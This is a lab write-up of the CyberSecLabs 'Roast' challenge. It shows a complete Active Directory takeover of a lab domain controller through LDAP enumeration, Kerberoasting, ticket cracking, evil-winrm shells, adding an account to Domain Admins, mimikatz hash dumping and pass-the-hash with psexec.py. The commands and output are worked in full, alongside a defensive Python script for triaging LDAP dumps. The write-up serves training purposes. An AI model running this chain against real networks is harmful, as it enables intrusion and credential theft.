CyberSecLabs – Roast writeup
https://www.cyberseclabs.co.uk/labs/challenge-labs/all
As always, we start with an nmap scan:
kali@kali:/opt/evil-winrm$ nmap -Pn -vv -A 172.31.3.2
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-18 08:06 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 08:06
Completed NSE at 08:06, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 08:06
Completed NSE at 08:06, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 08:06
Completed NSE at 08:06, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 08:06
Completed Parallel DNS resolution of 1 host. at 08:06, 0.00s elapsed
Initiating Connect Scan at 08:06
Scanning 172.31.3.2 [1000 ports]
Discovered open port 53/tcp on 172.31.3.2
Discovered open port 139/tcp on 172.31.3.2
Discovered open port 445/tcp on 172.31.3.2
Discovered open port 135/tcp on 172.31.3.2
Discovered open port 3389/tcp on 172.31.3.2
Discovered open port 636/tcp on 172.31.3.2
Discovered open port 3269/tcp on 172.31.3.2
Discovered open port 593/tcp on 172.31.3.2
Discovered open port 3268/tcp on 172.31.3.2
Discovered open port 464/tcp on 172.31.3.2
Discovered open port 88/tcp on 172.31.3.2
Discovered open port 389/tcp on 172.31.3.2
Completed Connect Scan at 08:06, 6.49s elapsed (1000 total ports)
Initiating Service scan at 08:06

The open ports alone say this is a domain controller: DNS (53), Kerberos (88) and kpasswd (464), LDAP and LDAPS (389/636) plus the global catalog ports (3268/3269), SMB (139/445), RPC (135/593) and RDP (3389). WinRM on 5985/tcp does not show up in this top-1000 scan but is confirmed by crackmapexec further down. The interesting service is LDAP, so that gets a dedicated script scan next:
kali@kali:/opt$ nmap -Pn -sV --script "ldap* and not brute*" -p 389 172.31.3.2
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-17 08:51 EDT
Nmap scan report for 172.31.3.2
Host is up (0.10s latency).

PORT    STATE SERVICE VERSION
389/tcp open  ldap    Microsoft Windows Active Directory LDAP (Domain: roast.csl, Site: Default-First-Site-Name)
| ldap-brute:
|   root:<empty> => Valid credentials
|   admin:<empty> => Valid credentials
|   administrator:<empty> => Valid credentials
|   webadmin:<empty> => Valid credentials
|   sysadmin:<empty> => Valid credentials
|   netadmin:<empty> => Valid credentials
|   guest:<empty> => Valid credentials
|   user:<empty> => Valid credentials
|   web:<empty> => Valid credentials
|_  test:<empty> => Valid credentials
| ldap-rootdse:
| LDAP Results
|   <ROOT>
|     domainFunctionality: 7
|     forestFunctionality: 7
|     domainControllerFunctionality: 7
|     rootDomainNamingContext: DC=roast,DC=csl
|     ldapServiceName: roast.csl:roast$@ROAST.CSL
|     isGlobalCatalogReady: TRUE
|     supportedSASLMechanisms: GSSAPI
|     supportedSASLMechanisms: GSS-SPNEGO
|     supportedSASLMechanisms: EXTERNAL
|     supportedSASLMechanisms: DIGEST-MD5
|     supportedLDAPVersion: 3
|     supportedLDAPVersion: 2
|     supportedLDAPPolicies: MaxPoolThreads
|     supportedLDAPPolicies: MaxPercentDirSyncRequests
|     supportedLDAPPolicies: MaxDatagramRecv
|     supportedLDAPPolicies: MaxReceiveBuffer
|     supportedLDAPPolicies: InitRecvTimeout
|     supportedLDAPPolicies: MaxConnections
|     supportedLDAPPolicies: MaxConnIdleTime
|     supportedLDAPPolicies: MaxPageSize
|     supportedLDAPPolicies: MaxBatchReturnMessages
|     supportedLDAPPolicies: MaxQueryDuration
|     supportedLDAPPolicies: MaxDirSyncDuration
|     supportedLDAPPolicies: MaxTempTableSize
|     supportedLDAPPolicies: MaxResultSetSize
|     supportedLDAPPolicies: MinResultSets
|     supportedLDAPPolicies: MaxResultSetsPerConn
|     supportedLDAPPolicies: MaxNotificationPerConn
|     supportedLDAPPolicies: MaxValRange
|     supportedLDAPPolicies: MaxValRangeTransitive
|     supportedLDAPPolicies: ThreadMemoryLimit
|     supportedLDAPPolicies: SystemMemoryLimitPercent
|     supportedControl: 1.2.840.113556.1.4.319
|     supportedControl: 1.2.840.113556.1.4.801
|     supportedControl: 1.2.840.113556.1.4.473
|     supportedControl: 1.2.840.113556.1.4.528
|     supportedControl: 1.2.840.113556.1.4.417
|     supportedControl: 1.2.840.113556.1.4.619
|     supportedControl: 1.2.840.113556.1.4.841
|     supportedControl: 1.2.840.113556.1.4.529
|     supportedControl: 1.2.840.113556.1.4.805
|     supportedControl: 1.2.840.113556.1.4.521
|     supportedControl: 1.2.840.113556.1.4.970
|     supportedControl: 1.2.840.113556.1.4.1338
|     supportedControl: 1.2.840.113556.1.4.474
|     supportedControl: 1.2.840.113556.1.4.1339
|     supportedControl: 1.2.840.113556.1.4.1340
|     supportedControl: 1.2.840.113556.1.4.1413
|     supportedControl: 2.16.840.1.113730.3.4.9
|     supportedControl: 2.16.840.1.113730.3.4.10
|     supportedControl: 1.2.840.113556.1.4.1504
|     supportedControl: 1.2.840.113556.1.4.1852
|     supportedControl: 1.2.840.113556.1.4.802
|     supportedControl: 1.2.840.113556.1.4.1907
|     supportedControl: 1.2.840.113556.1.4.1948
|     supportedControl: 1.2.840.113556.1.4.1974
|     supportedControl: 1.2.840.113556.1.4.1341
|     supportedControl: 1.2.840.113556.1.4.2026
|     supportedControl: 1.2.840.113556.1.4.2064
|     supportedControl: 1.2.840.113556.1.4.2065
|     supportedControl: 1.2.840.113556.1.4.2066
|     supportedControl: 1.2.840.113556.1.4.2090
|     supportedControl: 1.2.840.113556.1.4.2205
|     supportedControl: 1.2.840.113556.1.4.2204
|     supportedControl: 1.2.840.113556.1.4.2206
|     supportedControl: 1.2.840.113556.1.4.2211
|     supportedControl: 1.2.840.113556.1.4.2239
|     supportedControl: 1.2.840.113556.1.4.2255
|     supportedControl: 1.2.840.113556.1.4.2256
|     supportedControl: 1.2.840.113556.1.4.2309
|     supportedControl: 1.2.840.113556.1.4.2330
|     supportedControl: 1.2.840.113556.1.4.2354
|     supportedCapabilities: 1.2.840.113556.1.4.800
|     supportedCapabilities: 1.2.840.113556.1.4.1670
|     supportedCapabilities: 1.2.840.113556.1.4.1791
|     supportedCapabilities: 1.2.840.113556.1.4.1935
|     supportedCapabilities: 1.2.840.113556.1.4.2080
|     supportedCapabilities: 1.2.840.113556.1.4.2237
|     subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=roast,DC=csl
|     serverName: CN=ROAST,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=roast,DC=csl
|     schemaNamingContext: CN=Schema,CN=Configuration,DC=roast,DC=csl
|     namingContexts: DC=roast,DC=csl
|     namingContexts: CN=Configuration,DC=roast,DC=csl
|     namingContexts: CN=Schema,CN=Configuration,DC=roast,DC=csl
|     namingContexts: DC=DomainDnsZones,DC=roast,DC=csl
|     namingContexts: DC=ForestDnsZones,DC=roast,DC=csl
|     isSynchronized: TRUE
|     highestCommittedUSN: 86066
|     dsServiceName: CN=NTDS Settings,CN=ROAST,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=roast,DC=csl
|     dnsHostName: Roast.roast.csl
|     defaultNamingContext: DC=roast,DC=csl
|     currentTime: 20200817125113.0Z
|_    configurationNamingContext: CN=Configuration,DC=roast,DC=csl
| ldap-search:
|   Context: DC=roast,DC=csl
|     dn: DC=roast,DC=csl
|     dn: CN=David Smith,OU=Roast,DC=roast,DC=csl
|         objectClass: top
|         objectClass: person
|         objectClass: organizationalPerson
|         objectClass: user
|         cn: David Smith
|         sn: Smith
|         description: Your Password is WelcomeToR04st
|         givenName: David
|         distinguishedName: CN=David Smith,OU=Roast,DC=roast,DC=csl
|         instanceType: 4
|         whenCreated: 2020/05/15 06:30:43 UTC
|         whenChanged: 2020/05/15 21:42:47 UTC
|         displayName: David Smith
|         uSNCreated: 16572
|         uSNChanged: 32799
|         name: David Smith
|         objectGUID: 95a9772-f36-7344-9cc1-53d257cf635e
|         userAccountControl: 66048
|         badPwdCount: 0
|         codePage: 0
|         countryCode: 0
|         badPasswordTime: 2020-05-16T01:47:26+00:00
|         lastLogoff: 0
|         lastLogon: 2020-05-18T02:48:58+00:00
|         logonHours: \xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF
|         pwdLastSet: 2020-05-16T01:46:13+00:00
|         primaryGroupID: 513
|         objectSid: 1-5-21-4133422454-1522376082-951199702-1103
|         accountExpires: Never
|         logonCount: 1
|         sAMAccountName: dsmith
|         sAMAccountType: 805306368
|         userPrincipalName: dsmith@roast.csl
|         objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=roast,DC=csl
|         dSCorePropagationData: 2020/05/15 06:46:18 UTC
|         dSCorePropagationData: 2020/05/15 06:38:02 UTC
|         dSCorePropagationData: 1601/01/01 00:00:00 UTC
|         lastLogonTimestamp: 2020-05-16T01:48:13+00:00
|     dn: CN=Cody Rhodes,OU=Roast,DC=roast,DC=csl
|         objectClass: top
|         objectClass: person
|         objectClass: organizationalPerson
|         objectClass: user
|         cn: Cody Rhodes
|         sn: Rhodes
|         givenName: Cody
|         distinguishedName: CN=Cody Rhodes,OU=Roast,DC=roast,DC=csl
|         instanceType: 4
|         whenCreated: 2020/05/15 06:34:11 UTC
|         whenChanged: 2020/05/15 21:41:51 UTC
|         displayName: Cody Rhodes
|         uSNCreated: 16605
|         memberOf: CN=Remote Management Users,CN=Builtin,DC=roast,DC=csl
|         uSNChanged: 32794
|         name: Cody Rhodes
|         objectGUID: 264ab96b-32e6-7f47-9f71-45b9eae6ee8
|         userAccountControl: 66048
|         badPwdCount: 0
|         codePage: 0
|         countryCode: 0
|         badPasswordTime: 2020-05-16T01:47:26+00:00
|         lastLogoff: 0
|         lastLogon: 2020-05-16T01:58:03+00:00
|         logonHours: \xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF
|         pwdLastSet: 2020-05-16T01:47:17+00:00
|         primaryGroupID: 513
|         objectSid: 1-5-21-4133422454-1522376082-951199702-1104
|         accountExpires: Never
|         logonCount: 2
|         sAMAccountName: crhodes
|         sAMAccountType: 805306368
|         userPrincipalName: crhodes@roast.csl
|         objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=roast,DC=csl
|         dSCorePropagationData: 2020/05/15 06:46:18 UTC
|         dSCorePropagationData: 2020/05/15 06:37:46 UTC
|         dSCorePropagationData: 1601/01/01 00:00:00 UTC
|         lastLogonTimestamp: 2020-05-15T10:54:23+00:00
|     dn: CN=Steve Smith,OU=Roast,DC=roast,DC=csl
|         objectClass: top
|         objectClass: person
|         objectClass: organizationalPerson
|         objectClass: user
|         cn: Steve Smith
|         sn: Smith
|         givenName: Steve
|         distinguishedName: CN=Steve Smith,OU=Roast,DC=roast,DC=csl
|         instanceType: 4
|         whenCreated: 2020/05/15 06:35:06 UTC
|         whenChanged: 2020/05/15 06:38:17 UTC
|         displayName: Steve Smith
|         uSNCreated: 16612
|         uSNChanged: 16629
|         name: Steve Smith
|         objectGUID: 66dc74ae-c214-4e42-94e3-44092523e22
|         userAccountControl: 66048
|         badPwdCount: 2
|         codePage: 0
|         countryCode: 0
|         badPasswordTime: 2020-05-16T01:47:26+00:00
|         lastLogoff: 0
|         lastLogon: Never
|         pwdLastSet: 2020-05-15T10:40:32+00:00
|         primaryGroupID: 513
|         objectSid: 1-5-21-4133422454-1522376082-951199702-1105
|         accountExpires: 30828-09-14T06:53:31+00:00
|         logonCount: 0
|         sAMAccountName: ssmith
|         sAMAccountType: 805306368
|         userPrincipalName: ssmith@roast.csl
|         objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=roast,DC=csl
|         dSCorePropagationData: 2020/05/15 06:46:18 UTC
|         dSCorePropagationData: 2020/05/15 06:38:17 UTC
|         dSCorePropagationData: 1601/01/01 00:00:00 UTC
|_    dn: CN=Roast Svc,OU=Roast,DC=roast,DC=csl
Service Info: Host: ROAST; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.48 seconds
kali@kali:/opt$

Three things in this dump carry the whole box. First, the DC accepts anonymous LDAP binds: ldap-search returned full user objects without any credentials. The ldap-brute lines are the same fact seen from another angle, because AD treats a bind with an empty password as an unauthenticated (anonymous) bind and the script misreads that success as valid credentials for every username it tried; none of those are usable logins. (The filter "ldap* and not brute*" did not exclude the script, since its name is ldap-brute; "ldap* and not ldap-brute" would have.) Second, dsmith's description attribute spells out his password, WelcomeToR04st. Third, crhodes is a member of Remote Management Users, the builtin group that grants WinRM access, and there is a fourth user object, Roast Svc, for which nmap printed no attributes at all.
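What to pull out of a dump like this, as an added example (not code from the original write-up or from nmap): a small Python triage that splits nmap's "| attr: value" stream back into objects and flags the attributes that decided this box, a credential in a description, Remote Management Users membership, an SPN, and the userAccountControl bits behind the value 66048. The sample text is a constructed excerpt in the same shape as the output above; the servicePrincipalName line on the Roast Svc object is assumed for the demo, since nmap printed nothing for that object (the SPN itself only shows up later, in GetUserSPNs.py).

```python
"""Triage of an nmap ldap-search dump.  Added example, not part of the original
write-up or of nmap.  SAMPLE is a constructed excerpt in nmap's output shape; the
servicePrincipalName on Roast Svc is assumed for the demo."""
import re

# userAccountControl flag bits (UF_* values from MS-SAMR); 66048 = 0x10200
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWD",
    0x400000: "DONT_REQ_PREAUTH",
}
SECRET_RE = re.compile(r"pass(word|wd)?|pwd|cred|secret", re.I)

SAMPLE = (  # constructed, mirrors the nmap output above
    "| dn: CN=David Smith,OU=Roast,DC=roast,DC=csl | objectClass: top | objectClass: user "
    "| description: Your Password is WelcomeToR04st | userAccountControl: 66048 "
    "| sAMAccountName: dsmith "
    "| dn: CN=Cody Rhodes,OU=Roast,DC=roast,DC=csl | objectClass: top | objectClass: user "
    "| memberOf: CN=Remote Management Users,CN=Builtin,DC=roast,DC=csl "
    "| userAccountControl: 66048 | sAMAccountName: crhodes "
    "| dn: CN=Roast Svc,OU=Roast,DC=roast,DC=csl | objectClass: top | objectClass: user "
    "| servicePrincipalName: roast/ROAST | userAccountControl: 66048 "
    "|_ sAMAccountName: roastsvc"
)


def parse_ldap_dump(text: str) -> list:
    """One dict per object; every attribute except dn is a list, as LDAP is multi-valued.
    Works on both the flattened form above and nmap's one-attribute-per-line form."""
    objects, cur = [], None
    for tok in re.split(r"\s*\|_?\s+", text):  # nmap prefixes lines with '| ' or '|_ '
        key, sep, val = tok.partition(": ")
        if not sep:
            continue  # 'LDAP Results', 'Context: ...' header noise has no attribute
        if key == "dn":
            cur = {"dn": val}
            objects.append(cur)
        elif cur is not None:
            cur.setdefault(key, []).append(val)
    return objects


def decode_uac(value: str) -> list:
    """66048 decodes to NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD."""
    v = int(value)
    return [name for bit, name in UAC_FLAGS.items() if v & bit]


def triage(objects: list) -> list:
    """Return (sAMAccountName, finding, detail) tuples for user objects."""
    findings = []
    for o in objects:
        if "user" not in o.get("objectClass", []):
            continue
        sam = o.get("sAMAccountName", ["?"])[0]
        flags = decode_uac(o.get("userAccountControl", ["0"])[0])
        for text in o.get("description", []):
            if SECRET_RE.search(text):
                findings.append((sam, "credential in description", text))
        if any("CN=Remote Management Users," in g for g in o.get("memberOf", [])):
            findings.append((sam, "WinRM allowed (Remote Management Users)", ""))
        for spn in o.get("servicePrincipalName", []):
            findings.append((sam, "kerberoastable (SPN set)", spn))
        if "DONT_REQ_PREAUTH" in flags:
            findings.append((sam, "AS-REP roastable (no pre-auth)", ""))
        if "DONT_EXPIRE_PASSWD" in flags:
            findings.append((sam, "password never expires", "|".join(flags)))
    return findings


if __name__ == "__main__":
    for sam, what, detail in triage(parse_ldap_dump(SAMPLE)):
        print(f"{sam:10} {what:42} {detail}")
```

The same parser runs unchanged over a saved nmap output file, since the split pattern accepts the "| " line prefix whether it is followed by a newline or, as in the flattened copy above, by the next attribute.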
We make sure we have the latest impacket installed:

kali@kali:/opt$ sudo git-clone https://github.com/SecureAuthCorp/impacket.git
sudo: git-clone: command not found
kali@kali:/opt$ sudo git clone https://github.com/SecureAuthCorp/impacket.git
Cloning into 'impacket'...
remote: Enumerating objects: 18128, done.
remote: Total 18128 (delta 0), reused 0 (delta 0), pack-reused 18128
Receiving objects: 100% (18128/18128), 5.97 MiB | 4.64 MiB/s, done.
Resolving deltas: 100% (13833/13833), done.
kali@kali:/opt$ cd impacket/
kali@kali:/opt/impacket$ pip3 install .
The password from the description is checked with crackmapexec over SMB, which also confirms the build, the domain and that SMB signing is required:

kali@kali:/opt/impacket$ crackmapexec smb 172.31.3.2 -u dsmith -p WelcomeToR04st
SMB         172.31.3.2      445    ROAST            [*] Windows 10.0 Build 17763 (name:ROAST) (domain:roast.csl) (signing:True) (SMBv1:False)
SMB         172.31.3.2      445    ROAST            [+] roast.csl\dsmith:WelcomeToR04st

Share enumeration turns up only the default shares, with read access to IPC$, NETLOGON and SYSVOL:

kali@kali:/opt/evil-winrm$ crackmapexec smb 172.31.3.2 -u dsmith -p WelcomeToR04st --shares
SMB         172.31.3.2      445    ROAST            [*] Windows 10.0 Build 17763 (name:ROAST) (domain:roast.csl) (signing:True) (SMBv1:False)
SMB         172.31.3.2      445    ROAST            [+] roast.csl\dsmith:WelcomeToR04st
SMB         172.31.3.2      445    ROAST            [+] Enumerated shares
SMB         172.31.3.2      445    ROAST            Share           Permissions     Remark
SMB         172.31.3.2      445    ROAST            -----           -----------     ------
SMB         172.31.3.2      445    ROAST            ADMIN$                          Remote Admin
SMB         172.31.3.2      445    ROAST            C$                              Default share
SMB         172.31.3.2      445    ROAST            IPC$            READ            Remote IPC
SMB         172.31.3.2      445    ROAST            NETLOGON        READ            Logon server share
SMB         172.31.3.2      445    ROAST            SYSVOL          READ            Logon server share
kali@kali:/opt/evil-winrm$

WinRM is listening on 5985, but dsmith is refused. That matches the LDAP dump, where dsmith has no Remote Management Users membership and crhodes does:

kali@kali:/opt/impacket$ crackmapexec winrm 172.31.3.2 -u dsmith -p WelcomeToR04st
WINRM       172.31.3.2      5985   ROAST            [*] http://172.31.3.2:5985/wsman
WINRM       172.31.3.2      5985   ROAST            [-] ROAST0\dsmith:WelcomeToR04st "Failed to authenticate the user dsmith with ntlm"
Kerberoasting needs nothing more than a valid domain account to request service tickets. The request is made as crhodes, who turns out to share dsmith's password (the identical NTLM hashes in the LSA dump further down confirm the reuse). GetUserSPNs.py lists the one account with an SPN, roastsvc, requests a TGS for it and writes the ticket in a crackable form:

kali@kali:/tmp$ GetUserSPNs.py -request -dc-ip 172.31.3.2 roast.csl/crhodes -outputfile hashes.kerberoast
Impacket v0.9.22.dev1+20200813.221956.1c893884 - Copyright 2020 SecureAuth Corporation

Password:WelcomeToR04st
ServicePrincipalName  Name      MemberOf                                               PasswordLastSet             LastLogon  Delegation
--------------------  --------  -----------------------------------------------------  --------------------------  ---------  ----------
roast/ROAST           roastsvc  CN=Remote Management Users,CN=Builtin,DC=roast,DC=csl  2020-05-15 02:35:50.302845  <never>

kali@kali:/tmp$ cat hashes.kerberoast
$krb5tgs$23$*roastsvc$ROAST.CSL$roast/ROAST*$a06f00e18dbcc60631026290cd49c8c8$...
kali@kali:/tmp$

The $krb5tgs$23$ prefix means the ticket came back encrypted with RC4-HMAC (etype 23), which is keyed directly by the service account's NT hash, so an offline wordlist attack on the ticket recovers the account's plaintext password. The MemberOf column also shows roastsvc in Remote Management Users, so a cracked password will give a WinRM shell as that account. The encrypted ticket body is elided above.
john with rockyou.txt cracks it in under half a minute:

kali@kali:/tmp$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes.kerberoast
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!!!watermelon245 (?)
1g 0:00:00:25 DONE (2020-08-18 05:25) 0.03957g/s 567616p/s 567616c/s 567616C/s !!12Honey.. 0860776252
Use the "--show" option to display all of the cracked passwords reliably
Session completed
kali@kali:/tmp$
roastsvc is in Remote Management Users (the MemberOf column above), so the cracked password gives a WinRM shell straight away:

kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 172.31.3.2 -u roastsvc -p '!!!watermelon245'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\roastsvc\Documents>
crhodes can use WinRM as well, with the password reused from dsmith:

kali@kali:/opt/evil-winrm$ crackmapexec winrm 172.31.3.2 -u crhodes -p WelcomeToR04st
WINRM       172.31.3.2      5985   ROAST            [*] http://172.31.3.2:5985/wsman
WINRM       172.31.3.2      5985   ROAST            [+] ROAST0\crhodes:WelcomeToR04st (Pwn3d!)
kali@kali:/opt/evil-winrm$

From that shell SharpHound is uploaded and run to collect the groups, sessions, ACLs and other relationships that BloodHound graphs:

kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 172.31.3.2 -u crhodes -p 'WelcomeToR04st'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\crhodes\Documents> cd c:\puck
*Evil-WinRM* PS C:\puck> upload /opt/Bloodhound/Ingestors/Sharphound.exe
Info: Uploading /opt/Bloodhound/Ingestors/Sharphound.exe to C:\puck\Sharphound.exe

Data: 1110016 bytes of 1110016 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\puck> upload /opt/Bloodhound/Ingestors/Sharphound.ps1
Info: Uploading /opt/Bloodhound/Ingestors/Sharphound.ps1 to C:\puck\Sharphound.ps1

Data: 1297764 bytes of 1297764 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\puck> dir

    Directory: C:\puck

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        8/18/2020   3:42 AM         832512 Sharphound.exe
-a----        8/18/2020   3:42 AM         973323 Sharphound.ps1

*Evil-WinRM* PS C:\puck> ./Sharphound.exe
-----------------------------------------------
Initializing SharpHound at 3:42 AM on 8/18/2020
-----------------------------------------------

Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain ROAST.CSL using path CN=Schema,CN=Configuration,DC=ROAST,DC=CSL
[+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 19 MB RAM
Status: 61 objects finished (+61 61)/s -- Using 26 MB RAM
Enumeration finished in 00:00:01.8335102
Compressing data to .\20200818034254_BloodHound.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 3:42 AM on 8/18/2020! Happy Graphing!

*Evil-WinRM* PS C:\puck> dir

    Directory: C:\puck

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        8/18/2020   3:42 AM           8935 20200818034254_BloodHound.zip
-a----        8/18/2020   3:42 AM         832512 Sharphound.exe
-a----        8/18/2020   3:42 AM         973323 Sharphound.ps1
-a----        8/18/2020   3:42 AM          10118 ZDU2MDE4M2MtOTJlZC00MTRlLWFhMmEtOGJlM2E2ODA4ZjUy.bin

*Evil-WinRM* PS C:\puck>

The .bin file next to the zip is SharpHound's object cache. The zip is pulled back with evil-winrm's download command and loaded into the BloodHound UI; the filename here is from a later collection run on the 19th:

*Evil-WinRM* PS C:\puck> download 20200819234325_BloodHound.zip /tmp/20200819234325_BloodHound.zip
Info: Downloading C:\puck\20200819234325_BloodHound.zip to /tmp/20200819234325_BloodHound.zip

Info: Download successful!
*Evil-WinRM* PS C:\puck>
Next, roastsvc is added to Domain Admins:

net group "domain admins" roastsvc /add

Back in the roastsvc WinRM session, which is now a Domain Admin on the DC, mimikatz dumps the NTLM hashes out of the LSA. Note the typo in the first argument: mimikatz separates module and command with two colons, so "privilege:debug" is rejected as an unknown command of the standard module and its help text is printed, but the lsadump command that follows still runs and succeeds:

*Evil-WinRM* PS C:\users\roastsvc\Documents> ./mimikatz.exe "privilege:debug" "lsadump::lsa /patch" "exit"

  .#####.   mimikatz 2.2.0 (x64) #18362 May  2 2020 16:23:51
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # privilege:debug
ERROR mimikatz_doLocal ; "privilege:debug" command of "standard" module not found !

Module :        standard
Full name :     Standard module
Description :   Basic commands (does not require module name)

            exit  -  Quit mimikatz
             cls  -  Clear screen (doesn't work with redirections, like PsExec)
          answer  -  Answer to the Ultimate Question of Life, the Universe, and Everything
          coffee  -  Please, make me a coffee!
           sleep  -  Sleep an amount of milliseconds
             log  -  Log mimikatz input/output to file
          base64  -  Switch file input/output base64
         version  -  Display some version informations
              cd  -  Change or display current directory
       localtime  -  Displays system local date and time (OJ command)
        hostname  -  Displays system local hostname

mimikatz(commandline) # lsadump::lsa /patch
Domain : ROAST0 / S-1-5-21-4133422454-1522376082-951199702

RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : f6861a8cfc1c3b9f3ff39a8adb6bd388

RID  : 000001f5 (501)
User : Guest
LM   :
NTLM :

RID  : 000001f6 (502)
User : krbtgt
LM   :
NTLM : 016e928748d559770ee5fe3028baf718

RID  : 0000044f (1103)
User : dsmith
LM   :
NTLM : a0a8160111b21d48d2e816f4cc8da053

RID  : 00000450 (1104)
User : crhodes
LM   :
NTLM : a0a8160111b21d48d2e816f4cc8da053

RID  : 00000451 (1105)
User : ssmith
LM   :
NTLM : 23991f3cd665b0bc1f7cccfd62506161

RID  : 00000452 (1106)
User : roastsvc
LM   :
NTLM : 2f77331cfd7b2142b3a86a7d2ce7e824

RID  : 000003e8 (1000)
User : ROAST$
LM   :
NTLM : 0db85ab8c8395c6c1333a4e9e90ae400

mimikatz(commandline) # exit
Bye!
*Evil-WinRM* PS C:\users\roastsvc\Documents>

Two things stand out in the dump. dsmith and crhodes have the same NTLM hash, which is the password reuse that made crhodes usable with dsmith's password. And the krbtgt hash is in there too; on a real engagement that is the point at which the domain has to be treated as fully compromised, since any Kerberos ticket can be forged with it.
The Administrator NT hash is enough for pass-the-hash over WinRM:

kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 172.31.3.2 -u Administrator -H f6861a8cfc1c3b9f3ff39a8adb6bd388

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>

and for psexec.py, which drops a service binary on ADMIN$ and returns a SYSTEM shell. Impacket's -hashes argument takes LMHASH:NTHASH; below the NT hash is repeated in the LM slot, which works because the LM half is not used for NTLMv2 authentication, but the conventional form is -hashes :f6861a8cfc1c3b9f3ff39a8adb6bd388 with the LM part left empty:

kali@kali:/opt/evil-winrm$ psexec.py -hashes f6861a8cfc1c3b9f3ff39a8adb6bd388:f6861a8cfc1c3b9f3ff39a8adb6bd388 administrator@172.31.3.2
Impacket v0.9.22.dev1+20200813.221956.1c893884 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 172.31.3.2.....
[*] Found writable share ADMIN$
[*] Uploading file EqimrmMk.exe
[*] Opening SVCManager on 172.31.3.2.....
[*] Creating service Plxk on 172.31.3.2.....
[*] Starting service Plxk.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname
Roast

C:\Windows\system32>

Finally the flags. The lab names them *.txt.txt, so a recursive Get-ChildItem under C:\Users locates both:

kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 172.31.3.2 -u Administrator -H f6861a8cfc1c3b9f3ff39a8adb6bd388

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
Roast
*Evil-WinRM* PS C:\Users> Get-ChildItem -Path C:\Users -Filter *.txt.txt -Recurse -ErrorAction SilentlyContinue -Force
*Evil-WinRM* PS C:\Users\Administrator\desktop> type system.txt.txt
9d91f887b78d82444a5af8bbd0d115db
*Evil-WinRM* PS C:\Users> type C:\Users\roastsvc\Desktop\access.txt
0042894e0a6b2bc2c4517c5f7ccc5c16
https://m.twitch.tv/videos/708116376
Author : Puckiestyle